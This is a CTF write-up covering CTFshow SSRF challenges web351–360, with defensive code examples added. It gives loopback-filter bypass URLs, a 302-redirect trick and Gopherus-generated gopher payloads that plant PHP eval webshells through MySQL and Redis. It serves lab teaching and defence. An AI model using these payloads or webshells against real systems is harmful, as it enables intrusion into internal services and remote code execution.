CTFshow-SSRF
web351:
<?php
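// Start of the PHP file
error_reporting(0);
// Sets PHP's error reporting level to 0, which turns off the display of all errors and warnings. This is common in production to avoid exposing sensitive information or error details to users; during development it is better to leave error reporting on so problems are found and fixed promptly.
highlight_file(__FILE__);
// highlight_file() outputs the contents of the given file (here the currently executing file, supplied by the __FILE__ magic constant) as syntax-highlighted HTML. It is typically used for learning or demonstrating code; in production it can leak sensitive information.
$url=$_POST['url'];
// Reads the value with key 'url' from the $_POST superglobal and assigns it to $url, so the code expects a parameter named 'url' in a POST request.
$ch=curl_init($url);
// curl_init() starts a new cURL session for the $url obtained above. It returns a cURL handle, stored in $ch, that all later cURL calls use.
curl_setopt($ch, CURLOPT_HEADER, 0);
// curl_setopt() sets a transfer option. CURLOPT_HEADER set to 0 means HTTP headers are not included in the returned content, which is usually what you want because only the response body (the page content) matters.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Another transfer option: CURLOPT_RETURNTRANSFER set to 1 makes curl_exec() return the result as a string instead of printing it directly, so it can be stored in a variable for later use.
$result=curl_exec($ch);
// curl_exec() runs the session: it sends a request to the URL given to curl_init() and returns the result, stored here in $result. If the request fails, curl_exec() returns FALSE.
curl_close($ch);
// curl_close() closes the cURL session and frees all resources associated with it. A good habit that avoids resource leaks.
echo ($result);
// Finally, echo prints $result, the result of the cURL request. On success this is the content of the requested page; on failure (there is no error handling here) nothing is printed.
// End of the PHP file
?>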
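A directory scan turns up flag.php. Requesting it directly shows that it cannot be accessed from a non-local address, so read it through the SSRF: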
url=http://127.0.0.1/flag.php
web352:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
mixed parse_url ( string $url [, int $component = -1 ] )
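This function parses a URL and returns an associative array containing the components that appear in the URL.
This challenge filters localhost and 127.0.0; there are plenty of ways around it:
url=http://0x7F.0.0.1/flag.php (hexadecimal)
url=http://0177.0.0.1/flag.php (octal)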
url=http://0.0.0.0/flag.php
url=http://0/flag.php
url=http://127.127.127.127/flag.php
web353:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
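This one filters 127.0. and the full-width period (。). The following bypasses work (use an IP address base-conversion site):
Hexadecimal
url=http://0x7F.0.0.1/flag.php
Octal
url=http://0177.0.0.1/flag.php
Decimal integer format
url=http://2130706433/flag.php
Hexadecimal integer format (convert with the same site as above; remember the 0x prefix)
url=http://0x7F000001/flag.php
There is also a special abbreviated form
127.0.0.1 written as 127.1
Bypassing localhost with CIDR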
url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
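Why the string filters in web352 and web353 miss these hosts, as an added example (not part of the original write-up or the challenge code): every literal listed above is another spelling of an address in 127.0.0.0/8 or 0.0.0.0/8. The code normalises inet_aton-style literals to an address and checks that address against blocked ranges; the function names and the range list (which goes beyond loopback) are assumptions, and 64-bit PHP is assumed.

```php
<?php
// Added example, not from the original write-up. Function names are hypothetical.
// Numeric host literals are normalised the way inet_aton()-style parsers read
// them; the range check then runs on the address, not on the string.
const BLOCKED = ['0.0.0.0/8', '10.0.0.0/8', '127.0.0.0/8',
                 '169.254.0.0/16', '172.16.0.0/12', '192.168.0.0/16'];

// 32-bit address for a 1-4 part literal (decimal, 0-octal, 0x-hex), else null.
function ipv4_literal_to_int(string $host): ?int {
    $parts = explode('.', $host);
    if (count($parts) > 4) return null;
    $nums = [];
    foreach ($parts as $p) {
        if (preg_match('/^0x[0-9a-f]+$/i', $p))    $nums[] = hexdec(substr($p, 2));
        elseif (preg_match('/^0[0-7]*$/', $p))     $nums[] = octdec($p);
        elseif (preg_match('/^[1-9][0-9]*$/', $p)) $nums[] = (int)$p;
        else return null;                       // not numeric: treat as a DNS name
    }
    $last = array_pop($nums);                   // last part fills the remaining bytes
    $width = 8 * (4 - count($nums));
    if ($last >= 2 ** $width) return null;
    $addr = 0;
    foreach ($nums as $n) {
        if ($n > 255) return null;
        $addr = ($addr << 8) | $n;
    }
    return ($addr << $width) | $last;
}

function is_internal_ipv4(int $addr): bool {
    foreach (BLOCKED as $cidr) {
        [$net, $bits] = explode('/', $cidr);
        $mask = (0xFFFFFFFF << (32 - (int)$bits)) & 0xFFFFFFFF;
        if (($addr & $mask) === (ip2long($net) & $mask)) return true;
    }
    return false;
}

// Host strings from the bypass lists above, plus one ordinary DNS name.
foreach (['0x7F.0.0.1', '0177.0.0.1', '0.0.0.0', '0', '127.127.127.127',
          '2130706433', '0x7F000001', '127.1', 'example.com'] as $h) {
    $addr = ipv4_literal_to_int($h);
    echo str_pad($h, 18), $addr === null
        ? "name: resolve it, then check every returned address\n"
        : long2ip($addr) . (is_internal_ipv4($addr) ? " -> block\n" : " -> allow\n");
}
```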
web354:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
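This one filters 1 and 0. Here you can bypass the filter with a domain name that resolves to 127.0.0.1, or with a 302 redirect. For the former (an SSRF domain that resolves to 127.0.0.1),
the payload here is: http://safe.taobao.com/flag.php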
web355:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
Here the host length is limited to five characters, so just use http://0/flag.php to get past it.
web356:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
The host length is limited to 3; the payload from the previous challenge works again.
web357:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('ip!');
}
echo file_get_contents($_POST['url']);
}
else{
die('scheme');
}
?>
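The AI's explanation is as follows:
<?php
// Turn off PHP error reporting, so no errors or warnings are shown to the user
error_reporting(0);
// Show the highlighted source of the current file. This is usually for debugging; showing source code in production is unsafe.
highlight_file(__FILE__);
// Read the 'url' parameter from the POST request and store it in $url
$url=$_POST['url'];
// Parse $url with parse_url and store the result in the array $x
$x=parse_url($url);
// Check whether the 'scheme' key of $x equals 'http' or 'https'
// This ensures only HTTP or HTTPS URLs are processed, avoiding potential protocol-level issues (such as URL redirection attacks)
if($x['scheme']==='http'||$x['scheme']==='https'){
// Use gethostbyname to get the IP address of the host name in $url and store it in $ip
$ip = gethostbyname($x['host']);
// Print the resolved IP address, wrapped in HTML line-break tags
echo '</br>'.$ip.'</br>';
// Use filter_var with the FILTER_VALIDATE_IP filter to check that $ip is a valid IP address
// The FILTER_FLAG_NO_PRIV_RANGE and FILTER_FLAG_NO_RES_RANGE flags exclude private and reserved IP ranges
// If $ip is not a valid non-private, non-reserved IP address, die() stops the script and prints 'ip!'
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('ip!');
}
// If the IP address passes validation, file_get_contents fetches the content of the user-supplied URL and prints it
echo file_get_contents($_POST['url']);
}
else{
// If the scheme of $url is not HTTP or HTTPS, die() stops the script and prints 'scheme'
die('scheme');
}
?>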
Use a 302 redirect here. Put the following code on a public server:
<?php
header("Location: http://127.0.0.1:80/flag.php",TRUE,302);
?>
Then serve it temporarily with the following command:
php -S 0.0.0.0:2333
Pass the url parameter as:
url=http://<vps_ip>:<port>
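The web357 check validates the address returned by gethostbyname(), but file_get_contents() then makes its own request and follows redirects by default, so the checked address is not the one that ends up being contacted. A hardened fetch for comparison, as an added example (not the challenge's code; safe_fetch() and the timeout values are assumptions):

```php
<?php
// Added example, not the challenge's code; safe_fetch() is a hypothetical name.
// It validates the address that is actually connected to and never follows
// redirects, so a public host answering 302 cannot steer it to 127.0.0.1.
function safe_fetch(string $url): string {
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) throw new RuntimeException('url');
    $scheme = strtolower($p['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') throw new RuntimeException('scheme');
    if (isset($p['user']) || isset($p['pass'])) throw new RuntimeException('userinfo');
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);

    // Resolve once (IPv4 only, as gethostbyname does) and check the result.
    $ip = gethostbyname($p['host']);
    $flags = FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if (!filter_var($ip, FILTER_VALIDATE_IP, $flags)) throw new RuntimeException('ip');

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,   // a 3xx is reported, never followed
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$p['host']}:$port:$ip"],  // pin the checked IP
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $body = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    if ($body === false || $code < 200 || $code >= 300) {
        throw new RuntimeException("fetch refused or failed (HTTP $code)");
    }
    return $body;
}

// Constructed inputs; each is rejected before any network traffic is sent.
foreach (['http://127.0.0.1/flag.php', 'http://10.0.0.5/',
          'gopher://127.0.0.1:6379/_x'] as $u) {
    try { safe_fetch($u); echo "$u: fetched\n"; }
    catch (RuntimeException $e) { echo "$u: rejected (", $e->getMessage(), ")\n"; }
}
```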
web358:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
echo file_get_contents($url);
}
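Here a regular expression checks that $url starts with "http://ctf." and ends with ".show" (case-insensitive). The prefix check is bypassed with the @ sign, and the suffix check with a GET query string: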
http://ctf.@127.0.0.1/flag.php?show
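The web358 pattern is matched against the whole URL string, while the client connects to whatever parse_url() reports as the host. An added example (not the challenge's code) that runs the original pattern next to a check on the parsed components; component_check() and the intended host rule it encodes are assumptions:

```php
<?php
// Added example, not the challenge's code; component_check() is hypothetical.
function regex_check(string $url): bool {        // the web358 pattern, unchanged
    return preg_match('/^http:\/\/ctf\..*show$/i', $url) === 1;
}

// Assumption: the intended rule is "http only, host ctf.<labels>.show".
function component_check(string $url): bool {
    $p = parse_url($url);
    if ($p === false || strtolower($p['scheme'] ?? '') !== 'http') return false;
    if (isset($p['user']) || isset($p['pass'])) return false;  // no userinfo
    $host = strtolower($p['host'] ?? '');
    return preg_match('/^ctf\.([a-z0-9-]+\.)*show$/D', $host) === 1;
}

$samples = [
    'http://ctf.example.show',                   // constructed
    'http://ctf.example.show/index.php',         // constructed
    'http://ctf.@127.0.0.1/flag.php?show',       // the URL from the write-up
];
foreach ($samples as $u) {
    printf("%-38s regex=%d components=%d host=%s\n",
        $u, regex_check($u), component_check($u), parse_url($u, PHP_URL_HOST));
}
```

The middle sample shows the pattern is wrong in the other direction too: it rejects an ordinary URL on an allowed host because the string does not end in "show".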
web359:
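After entering an arbitrary username and password, the page redirects to check.php. Capturing the request shows a returl parameter in the POST body, so the attack is built over the gopher protocol, using Gopherus to generate the gopher URL.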
┌──(root㉿MSI)-[/home/g01den/Tools/Gopherus]
└─# python2 gopherus.py --exploit mysql
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: root
Give query to execute: select "<?php @eval($_POST["cmd"]);?>" into outfile '/var/www/html/2.php';
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%22%63%6d%64%22%5d%29%3b%3f%e3%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%32%2e%70%68%70%27%3b%01%00%00%00%01
-----------Made-by-SpyD3r-----------
The generated gopher URL cannot be used as is; it has to be URL-encoded once more before use:
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2522%2563%256d%2564%2522%255d%2529%253b%253f%25e3%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2532%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501
I don't know why, but my own payload doesn't work, so here is someone else's:
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2545%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2522%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2522%2501%2500%2500%2500%2501
Then request 1.php and POST 1=system("cat+/flag.txt"); to finish.
web360:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
Use it like this:
┌──(root㉿MSI)-[/home/g01den/Tools/Gopherus]
└─# python2 gopherus.py --exploit redis
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
Ready To get SHELL
What do you want?? (ReverseShell/PHPShell): php
Give web root location of server (default is /var/www/html):
Give PHP Payload (We have default PHP Shell): <?php eval($_post[1]);?>
Your gopher link is Ready to get PHP Shell:
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_post%5B1%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
-----------Made-by-SpyD3r-----------
I don't know why, but mine still doesn't work. In theory, though, after sending it you can request shell.php and get RCE.
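What a gopher:// value in a url parameter carries, as an added example for log review (not part of the original write-up): the decoder below turns such a URL into the Redis (RESP) commands it would deliver to port 6379 and flags the command names that appear in the generated link above. The function name, the watch list and the sample URL are assumptions; the sample is constructed and contains no payload body.

```php
<?php
// Added example, not from the original write-up; function names are hypothetical.
// A gopher:// URL makes the fetcher write the decoded path to a TCP port as-is,
// which is how an HTTP parameter ends up speaking Redis. This decodes such a
// value (as the application sees it in $_POST['url']) into RESP commands.
function gopher_resp_commands(string $url): array {
    $p = parse_url($url);
    if ($p === false || strtolower($p['scheme'] ?? '') !== 'gopher') return [];
    // Path is "/" + one item-type character + the bytes to send.
    $raw = rawurldecode(substr($p['path'] ?? '', 2));
    $cmds = [];
    $pos = 0;
    while (preg_match('/\G\*(\d+)\r\n/', $raw, $m, 0, $pos)) {   // "*<argc>"
        $pos += strlen($m[0]);
        $args = [];
        for ($i = 0; $i < (int)$m[1]; $i++) {
            if (!preg_match('/\G\$(\d+)\r\n/', $raw, $b, 0, $pos)) break 2;
            $pos += strlen($b[0]);
            $args[] = substr($raw, $pos, (int)$b[1]);            // "$<len>" + data
            $pos += (int)$b[1] + 2;                              // skip data + CRLF
        }
        $cmds[] = $args;
    }
    return $cmds;
}

// Redis commands seen in the generated link above; none belong in a URL fetch.
const WATCHED = ['FLUSHALL', 'CONFIG', 'SAVE'];

// Constructed sample with the same shape as the tool output, no payload body.
$sample = 'gopher://127.0.0.1:6379/_%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset'
        . '%0D%0A%243%0D%0Adir%0D%0A%244%0D%0A/tmp%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A';
foreach (gopher_resp_commands($sample) as $args) {
    $hit = in_array(strtoupper($args[0] ?? ''), WATCHED, true) ? 'ALERT' : 'info ';
    echo $hit, ' ', implode(' ', $args), "\n";
}
```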